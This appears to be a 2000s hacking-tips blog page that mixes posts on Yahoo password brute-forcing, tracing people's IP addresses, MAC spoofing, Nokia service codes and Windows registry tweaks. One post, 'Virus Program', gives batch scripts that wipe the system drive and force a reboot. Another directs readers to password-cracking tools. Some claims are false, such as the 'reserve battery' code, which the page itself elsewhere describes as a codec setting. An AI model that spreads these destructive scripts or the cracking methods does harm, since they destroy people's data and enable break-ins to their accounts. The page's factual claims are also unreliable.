6:23 PM 2 comments

muhahaha virus solution

if u r infected ith this virus then whenever u'll open orkut
the browser window get automatically closed and a dialog box appears saying

To fix it

go to the windows directory of ur pc.. most probably it's c: seacrch for the folder name heap41(it's hidden)... delete it also
go to search menu and type heap41a and press enter. many files and folders will be displayed. delete all of them.
then go to run->regedit->edit->find and type heap41a as search query...

delete any serach result which contains the word heap.
restart your system adn u can access gmail and orkut now.......

6:16 PM 0 comments

Yahoo Hack

Methods of getting yahoo passwords
I will explain in this tutorial how to obtain in difrent
ways yahoo passwords so that any N00B can understand and do
It actualy isen't that hard the problem is thet with the
passing of years yahoo security has been getting better and
beter an most proggyes don't work anymore now I will
present to u the most efective reliable and easy to do
methods.After that I will also Informe you on how to
protect your self of thees dangers that go around te


------BRUTE FORCING------
This is by far the most used method .You can find crackers
everywhere to download .On[hide]www.hackerspk.com [/hide]

there are a lot
of good cracked downloads.The one for which i sugest
R-G-Kracka it's easy to use and works. This is the most
sawed for method but is good for 2 things cracking boots
and when u realy want a password and will spend some time
cracking testing and working.
For this You have to get A cracker A password list and in
some cases a proxy list but I sugest u try a non proxy
cracker if it's ur first time.
This is a basic method and I'm sure that everyone will get
it the first time aldough results depend on your password
PROTECTION It's simple get a very long password with asci
and numbers the most hard and long password that a brute
forcer will have trouble cracking and getting to is the
last of all asci letters and numbers the last password a
normal brute forcew of let's say 10 chars will be
"zzzzzzzz9!" thIs password will be the last one it will try
to crack.
6:14 PM 2 comments

Nokia Phones

These 3 codes work on 90% of Nokia phones;

*#06# n/a Display the IMEI (Standard GSM command, works on all phones)
*#0000# n/a Display the firmware version and date
*#92702689# *#war0anty# Here you can view the S/N and the IMEI as well as the life timer (newer models). The date the phone left the factory and the date it was purchased. If your phone has been repaired the date of the repair is also visible. You will need to turn the phone off to exit this menu. Newer phones simply require you to press ok.

The following codes are specific to older series 40 phones; (Entering the following codes will restart the phone)

*4720# (*hra0#) Cctivates Half Rate, Half Rate is 5.6kbit/s and uses half the bandwidth at the cost of call quality. Network operators often activate half rate on overloaded towers during peak times to save costs.
#4720# (#hra0#) Deactivates Half Rate
*3370# (*efr0#) Activates Enhanced Full Rate, EFT attempts to match wire quality. The calls are 12.2kbit/s and are not supported by all operators. It is compatibale with the hightest AMR mode.
#3370# (#efr0#) Deactivates Enhanced Full Rate
*#746085685# (*#sim0clock#) Display the SIM clock status

The following codes are phone specific or phase related;

*#7220# (*#pca0#) Activate the GPRS PCCCH support (Packet Common Control Channel)
*#7230# (*#pcd0#) Deactivate the GPRS PCCCH support
*#7760# (*#ssn0#) Display the manufacturing serial number

This only works on the 3310 and 3330;

*#67705646# (*#opr0logo#) Clear the operator logo, the logo will be reset to the default network operator logo.

The following codes work on newer series 40 & series 60/80 phones;

*#2820# (*#bta0#) Display the Bluetooth MAC address (Phone must have a built in bluetooth adapter)
*#7370925538# (*#res0wallet#) Reset the mobile wallet (Phone must have the mobile wallet feature)
*#7370# (*#res0#) Soft-format the memory (Symbian)
*#7780# (*#rst0#) Reset to factory defaults, confirmation required (also known has a Hard-format), all phone contents will be wiped clean including contacts and smses if they are stored on the phone

If you have any other codes or tips please do not hesitate to forward them to me and I will add them here.

5:06 PM 1 comments


In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.

Well I guess its one of the most important must learn manul for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.

What is IP and how to get the IP of a remote system::

Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.

Lets take the example of the following IP address: Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:

Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx

The various classes will be clearer after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".

A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

"24's" and is commonly used by most ISP's.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.

Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:


where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.


For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?

So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.

This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.

In my country, say there are three main ISP’s:

ISP Name Network Address Allotted

ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx

Now, if I get to know the IP of an e-pal of mine, and it reads:, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.

Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.

Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :

Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED

Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.

To know your own IP type the following command in a dos windows

C:\netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :

Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 ESTABLISHED

TCP 203.xx.251.161:1043 FIN_WAIT_2

TCP 203.xx.251.161:1053 TIME_WAIT

TCP 203.xx.251.161:1058 TIME_WAIT

TCP 203.xx.251.161:1069 TIME_WAIT

TCP 203.xx.251.161:1071 ESTABLISHED

TCP 203.xx.251.161:1078 TIME_WAIT

Here 203.xx.251.161 is your IP address.

Now lets clarify the format used by netstat :

Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.

Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.


in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system

Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like


Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED

Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.

Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port

Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].

Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)

Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.

How to get the IP of a remote system while chatting through msn messenger ::

This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED

The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.

Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b




or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.

Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.


Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name


-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.

You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com []

TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP indicates that the system is in India. In India IPs generally begin with 203 and 202

C:\WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [] over a maximum of 30 hops:

1 308 ms 142 ms 127 ms

2 140 ms 135 ms *

3 213 ms 134 ms 132 ms

4 134 ms 130 ms 129 ms

5 122 ms 135 ms 131 ms

6 141 ms 137 ms 121 ms

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in []

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net []

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net []

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net []

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net []

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net []

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com []

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com []

16 666 ms 676 ms 674 ms yahoo.com []

Trace complete.

Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.

Now carefully looking at the results you can figure out many information about yahoo’s server []

First packets of data leave my ISP which is at .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.

Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.

Firewall Detection

While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.


Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :


Tracing route to lc2.law5.hotmail.com []

over a maximum of 30 hops:

1 * * * Request timed out.

2 161 ms 147 ms 85 ms

3 126 ms 261 ms 219 ms

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com []

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in []

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in []

7 826 ms 731 ms 819 ms

8 885 ms 744 ms 930 ms

9 851 ms 1020 ms 1080 ms

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net []

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net []

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net []

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net []

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net []

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net []

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.

I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.

Detecting Traceroute Attempts on your System

You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:

1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.

2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.

3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.

You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:

The Operating System running on the attacker’s target system.
Number of hops away, the attacker is from you.

OKI DOKI that’s all for this article. Hope you will find this article very easy to understand and implement.

contribution : abhishek

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IP Hack contd..

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this is fantastic
posted by ramakanths Dec 9, 1:55 AM EST Watch
rahul u r great,your atricles on hacking,orkut tricks etc are really fantastic,i like your attitude,this site is awesome,,
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Ip Address Hack Contd

Changing your MAC on Windows XP

There are two ways two change your IP on Windows. The easy way, and the hard way. Ill discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it is, if your NIC (Network Interface Card) supports cloning your MAC Address. If this is the case then you go to.

Start > Control Panel > Network Connections

Right Click on your NIC card and goto properties. Then click the button labeled Configure. It should bring up another form. Click on the advanced tab. You should see under Property "Locally Administered Address" or "Network Address". Click the radio button next to the text box, and type in your new MAC address. (note you do not use the "-" when you enter your no MAC Address.

To check and see if it worked or not go to

Start > Run > and type in "cmd"

When the terminal comes up issue the command.

ipconfig /all

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in "cmd"

Once the terminal comes up type in

"net config rdr"

It should bring up alot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in "regedt32"

That should bring up the windows registry. Once the registry is up go to


Click on the drop down menu and you should see the sub-categories

and so on.

Click on each one and compare the "NetCfgInstanceId" Key with the number you wrote down earlier. Once you find a match double click on the key "NetworkAddress" and change the value to your new MAC address. Hit ok and reboot your system.

There r several ways u can determine ur IP address information:


Start / Run / cmd
This opens a command window. One advantage is that u can send the information to a text file (IPCONFIG /ALL > c:\ip.txt)
But sometimes the window shows show much information u need to scroll around to fine it.


Control Panel / Network Connections / Double click the icons 4 ur network (If the network has an icon in the system tray u can also just double click on that icon)
Click on the Support tab
Click on the Details button
Make Pictures Smaller Unavailable

When u try nd send pictures through e-mail, u should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

regsvr32 shimgvw.dll
Creating a Suspend Shortcut

If u would like to create an icon to suspend ur computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name u want
Now when u click on that shortcut, ur computer will shutdown nd suspend
Submitted by Gabe
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, u r only allowed to create administrators or limited users.
If u want to create

Right click on My Computer
Local Users nd Groups
Right click on the user u want to change
Member of tab
Add button
Advanced button
Find Now button
From here u see the full list of possibilities (e.g. Power User, Backup Operator etc.)

some more
Determining Which Services r Associated with SVCHOST

Since so many critical services r run with each svchost,
You can see which ones r being used by opening a cmd prompt nd running:

tasklist /svc /fi "imagename eq svchost.exe"

Note: This is available only with XP Pro
Identify Faulty Device Drivers

If u r having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verfier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers u want to confirm
A list of drivers to be verified on the next boot will be shown.
If ur computer stops with a blue screen, u should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
Viewing Installed Drivers

If u want to see a list of installed drivers, u can run the driverquery program
There r a lot of available switches to view different types of information.
On use can be to export to a CSV file 4 viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv

5:04 PM 0 comments

Hiding Drive

This setting allows you to control which drives are visible in My Computer and Explorer. It is possible to hide all drives or just selected ones.

Open your registry (press win+r and type regedit , hit enter )


and find or create the DWORD "NoDrives" there by right clicking on explorer -> NEW -> DWORD value .

The "NoDrives" value uses a 32-bit word to define local and network drive visibility for each logical drive in the computer. The lower 26 bits of the 32-bit word correspond to drive letters A through Z. Drives are visible when set to 0 and hidden when set to 1.

If your not happy working in Hex, add these decimal numbers to hide the drive(s):

A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863

For example to hide drive A and drive D, you would add 1 (A) + 8 (D) which means the value should be set to "9".

To disable all the drives set the value to "67108863".

Restart Windows for the change to take effect.

Note: These drives will still appear in File Manager, to remove File Manager, delete or rename winfile.exe.
5:02 PM 1 comments

Virus Program

Virus program Crach your PC in a Second

@Echo off
Del C:\ *.*|y

save it as Dell.bat


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

5:01 PM 0 comments

NOKIA Cell Phone Codes

1 Imagine ur cell battery is very low, u r expecting an important call and u don't have a charger.

Nokia instrument comes with a reserve battery. To activate, key is "*3370#"

Ur cell will restart with this reserve and ur instrument will show a 50% incerase in battery.

This reserve will get charged when u charge ur cell next time.

*3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx. 5%
#3370# Deactivate Enhanced Full Rate Codec( EFR)

*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound
but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec

2 *#0000# Displays your phones software version,

1st Line :S oftware Version,
2nd Line : Software Release Date,
3rd Line : Compression Type
3 *#9999# Phones software v ersion if *#0000# does not work

4 *#06# For checking the International Mobile Equipment Identity (IMEI Number)

5 #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

6 #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

7 #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

8 #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)

9 *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone)

10 *#21# Allows you to check the number that "All Calls" are diverted To

11 *#2640# Displays security code in use

12 *#30# Lets you see the private number

13 *#43# Allows you to check the "Call Waiting" status of your phone.

14 *#61# Allows you to check the number that "On No Reply" calls are diverted to

15 *#62# Allows you to check the number that "Divert If Unrea chable(no service)" calls are diverted to

16 *#67# Allows you to check the number that "On Busy Calls" are diverted to

17 *#67705646#R emoves operator logo on 3310 & 3330

18 *#73# Reset phone timers and game scores

19 *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it
means you will get the best standby time possible

20 *#7760# Manufactures code

21 *#7780# Restore factory settings

22 *#8110# Software version for the nokia 8110

23 *#92702689# (to rember *#WAR0ANTY#)

Displays -
1.Serial Number,
2.Date Made
3.Purchase Date,
4.Date of last repair (0000 for no repairs),
5.Transfer User Data.
To exit this mode -you need to switch your phone off then on again

24 *#94870345123456789# Deactivate the PWM-Mem

25 **21*number# Turn on "All Calls" diverting to the phone number entered

26 **61*number# Turn on "No Reply" diverting to the phone number entered

27 **67*number# Turn on "On Busy" diverting to the phone number entered

Each command is prefixed with either one or two * or # characters as follows:
** Register and Activate
* Activate
## De-Register (and Deactivate)
# Deactivate
*# Check Status
© Call button

Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).

Command Description Command String
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
Display IMEI *#06#
Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate /td> **67*number#©<
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring
Activate barr all outgoing calls (see Security to set code) **33*code#©
Deactivate barr all outgoing calls #33*code#©
Check status of barr all outgoing calls *#33#©
Activate barr all calls **330*code#©
Deactivate barr all calls #330*code#©
Check status of barr all calls /td> *#330*code#©<
Activate barr all outgoing international calls **331*code#©
Deactivate barr all outgoing international calls #331*code#©
Check status of barr all outgoing international calls *#331#©
Activate barr all outgoing international calls except to home country **332*code#©
Deactivate barr all outgoing international calls except to home country #332*code#©
Check status of barr all outgoing international calls except to home country *#332#©
Activate barr all outgoing calls **333*code#©
Deactivate barr all outgoing calls #333*code#©
Check status of barr all outgoing calls *#333#©
Activate barr all incoming calls **35*code#©
Deactivate barr all incoming calls #35*code#©
Check status of barr all incoming calls *#35#©
Activate barr all incoming calls when roaming **351*code#©
Deactivate barr all incoming calls when roaming #351*code#©
Check status of barr all incoming calls when roaming *#351#©
Activate barr all incoming calls **353*code#©
Deactivate barr all incoming calls #353*code#©
Check status of barr all incoming calls *#353#©
Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)
CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one's own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©
4:59 PM 0 comments

Hide the username on start menu

Navigate to:



Change the DWORD Valude NoUserNameInStartMenu to 1 to hide the username to display..
4:58 PM 0 comments


The below debug routine is to check the date of your BIOS. All BIOS dates on PC compatible computers is stored at memory address FFFF5h. To display the date of your BIOS do the following: At the C:\> type debug - d FFFF:5 L 8 After typing the above
command you should receive a string similar to: FFFF:0000 30 34 2F-33 30 2F 39 38 4/30/98 The 4/30/98 would be the date
of your computer BIOS.
4:55 PM 0 comments

DOS in Right Click

if you still use the DOS prompt regularly then this setting creates a new right-click menu option to open a command prompt at the selected directory.

Open your registry (press win+r and type regedit , hit enter )


Create a new sub key called 'Command' under the main key (i.e. [HKEY_CLASSES_ROOT\Directory\shell\Command]). Change the value of '(Default)' within the key to equal the text you would like on the right-click menu, for example 'Command Prompt'.

Create another new sub-key under the key created above, named 'command' (i.e. [HKEY_CLASSES_ROOT\...\Command\command]). Change the value of '(Default)' within this key depending on your operating system to equal either:

Windows 95, 98 or Me
command.com /k cd "%1"


Windows NT, 2000 or XP
cmd.exe /k cd %1

Now right-click on a folder and the new option of 'Command Prompt' should be available.
4:51 PM 0 comments

DOS Commands

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
